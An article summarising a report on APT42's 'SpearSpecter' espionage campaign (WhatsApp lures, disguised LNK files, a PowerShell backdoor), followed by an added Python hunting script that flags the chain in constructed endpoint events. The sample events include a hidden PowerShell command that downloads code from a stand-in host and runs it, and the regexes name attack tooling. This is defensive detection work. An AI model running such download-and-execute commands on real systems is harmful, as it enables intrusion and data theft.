Iranian Hackers Launch “SpearSpecter” Espionage Operation Targeting Security and Government Agencies


471/68 Tuesday, November 18, 2025

The Israel National Digital Agency (INDA) has published a report describing a new cyber-espionage campaign it calls "SpearSpecter," operated by APT42, a threat group backed by the Iranian government and linked to the Islamic Revolutionary Guard Corps (IRGC). The operation was first detected in early September 2025 and is still ongoing. Its primary targets are senior officials in the defense and government sectors. The attackers rely on highly convincing social engineering: they impersonate trusted figures and approach the target with invitations to prestigious seminars or requests to schedule important meetings. Notably, the operation also targets family members of high-profile individuals as an additional route to compromising the intended victim.

The attack chain is multi-staged. It begins with the threat actor impersonating a trusted contact over WhatsApp and sending a link that supposedly leads to important meeting documents. When the victim clicks the link, the page invokes the Windows "search-ms:" URI scheme, which makes Windows Explorer display a search view populated from attacker-controlled remote storage; the view contains a Windows Shortcut (LNK) file disguised as a PDF. Once the victim opens the LNK file, it silently contacts the attackers' infrastructure hosted on Cloudflare Workers and downloads a loader script that installs a PowerShell backdoor known as "TAMECAT."

The TAMECAT malware is equipped with extensive espionage capabilities, including system reconnaissance, theft of files selected by a predefined list of extensions, browser data extraction (from Chrome and Edge), theft of Outlook mailbox contents, and continuous screenshot capture. The malware also employs several strategies to remain undetected. It communicates with its command-and-control (C2) servers over three channels in parallel (HTTPS, Discord, and Telegram), so that connectivity survives even if one channel is blocked. It also runs in memory, using encryption and heavy obfuscation to hinder analysis and evade security tools.
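The chain described in the two paragraphs above (a search-ms: URI pointing at remote storage, an LNK posing as a document, explorer.exe spawning a hidden PowerShell loader, and a script host beaconing to Discord, Telegram or a Cloudflare Workers host) leaves marks in ordinary endpoint telemetry, which is where a defender would hunt for it given that the backdoor itself runs in memory. The Python below is an added example written for this page, not code from INDA, The Hacker News or the campaign. The Sysmon-style event records are constructed, the field names, PIDs, the 203.0.113.5 address and the example-loader.workers.dev hostname are assumptions, and the host patterns are a generic heuristic rather than indicators taken from the report.

```python
"""Hunting heuristics for a search-ms -> LNK -> PowerShell -> chat-platform C2 chain.

Added example (not from the original article). Events are constructed,
Sysmon-style records: id 1 = process create, 3 = network connect, 11 = file create.
"""
import re
from dataclasses import dataclass

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed telemetry: one malicious chain (pids 410 -> 520) plus benign noise (pid 640).
SAMPLE_EVENTS = [
    {"id": 1, "pid": 410, "ppid": 300, "image": EXPLORER,
     "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'"C:\Windows\explorer.exe" "search-ms:query=agenda&crumb=location:\\203.0.113.5@80\docs&displayname=Meeting"'},
    {"id": 11, "pid": 410, "image": EXPLORER,
     "target": r"C:\Users\victim\Downloads\Meeting_Agenda.pdf.lnk"},
    {"id": 1, "pid": 520, "ppid": 410, "image": PS_IMAGE, "parent_image": EXPLORER,
     "cmdline": r'powershell.exe -nop -w hidden -ep bypass -c "iex (iwr https://example-loader.workers.dev/s -UseBasicParsing).Content"'},
    {"id": 3, "pid": 520, "image": PS_IMAGE, "dest_host": "api.telegram.org", "dest_port": 443},
    {"id": 3, "pid": 520, "image": PS_IMAGE, "dest_host": "discord.com", "dest_port": 443},
    # Benign: an admin script launched from the desktop that talks to an internal file server.
    {"id": 1, "pid": 640, "ppid": 410, "image": PS_IMAGE, "parent_image": EXPLORER,
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"id": 3, "pid": 640, "image": PS_IMAGE, "dest_host": "fileserver.corp.example", "dest_port": 445},
]

# search-ms: URI whose crumb points at a remote (UNC / WebDAV-style) location.
SEARCH_MS_REMOTE = re.compile(r"search-ms:.*location:\\\\", re.I)
# A shortcut whose name ends in a document extension, e.g. report.pdf.lnk.
DISGUISED_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.I)
# PowerShell launched hidden, encoded, or pulling code from the network.
PS_SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|\biex\b|\biwr\b|downloadstring)", re.I)
# Heuristic list of chat-platform and Workers hosts; assumption, not report IOCs.
C2_HOSTS = re.compile(r"(^|\.)(discord(app)?\.com|api\.telegram\.org|workers\.dev)$", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Alert:
    rule: str
    pid: int
    evidence: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Apply the four stage-specific rules to a stream of events."""
    alerts = []
    for e in events:
        img = basename(e.get("image", ""))
        if e["id"] == 1:
            cmd = e.get("cmdline", "")
            if SEARCH_MS_REMOTE.search(cmd):
                alerts.append(Alert("search_ms_remote_share", e["pid"], cmd))
            if (img == "powershell.exe" and basename(e.get("parent_image", "")) == "explorer.exe"
                    and PS_SUSPICIOUS.search(cmd)):
                alerts.append(Alert("explorer_spawns_hidden_powershell", e["pid"], cmd))
        elif e["id"] == 11 and DISGUISED_LNK.search(e.get("target", "")):
            alerts.append(Alert("lnk_disguised_as_document", e["pid"], e["target"]))
        elif e["id"] == 3 and img in SCRIPT_HOSTS and C2_HOSTS.search(e.get("dest_host", "")):
            alerts.append(Alert("script_host_to_chat_or_worker_c2", e["pid"],
                                f"{e['dest_host']}:{e['dest_port']}"))
    return alerts


def correlate(events, alerts):
    """Group alerts by process lineage so the whole chain surfaces as one finding.

    Walks pid -> ppid links from process-create events up to the highest ancestor
    that was itself observed, and returns {root_pid: sorted distinct rule names}.
    """
    parent = {e["pid"]: e["ppid"] for e in events if e["id"] == 1}

    def root(pid):
        while pid in parent and parent[pid] in parent:
            pid = parent[pid]
        return pid

    chains = {}
    for a in alerts:
        chains.setdefault(root(a.pid), set()).add(a.rule)
    return {pid: sorted(rules) for pid, rules in chains.items()}


def is_full_chain(rules, min_stages: int = 3) -> bool:
    """Escalate when several distinct stages of the chain hit the same lineage."""
    return len(rules) >= min_stages


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for pid, rules in correlate(SAMPLE_EVENTS, found).items():
        print(pid, "FULL CHAIN" if is_full_chain(rules) else "partial", rules)
```

Each rule on its own is noisy (administrators do launch PowerShell from the desktop, and search-ms: has legitimate uses), which is why the correlation step matters: a lineage that trips three or four distinct stages is far more telling than any single hit. The benign pid 640 records in the sample are there to show that a plain `-File` launch and an internal SMB connection generate nothing. In a real deployment the host list would be tuned to the environment, and outbound traffic from script hosts to consumer chat platforms is usually worth alerting on regardless of this campaign.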

Source: https://thehackernews.com/2025/11/iranian-hackers-launch-spearspecter-spy.html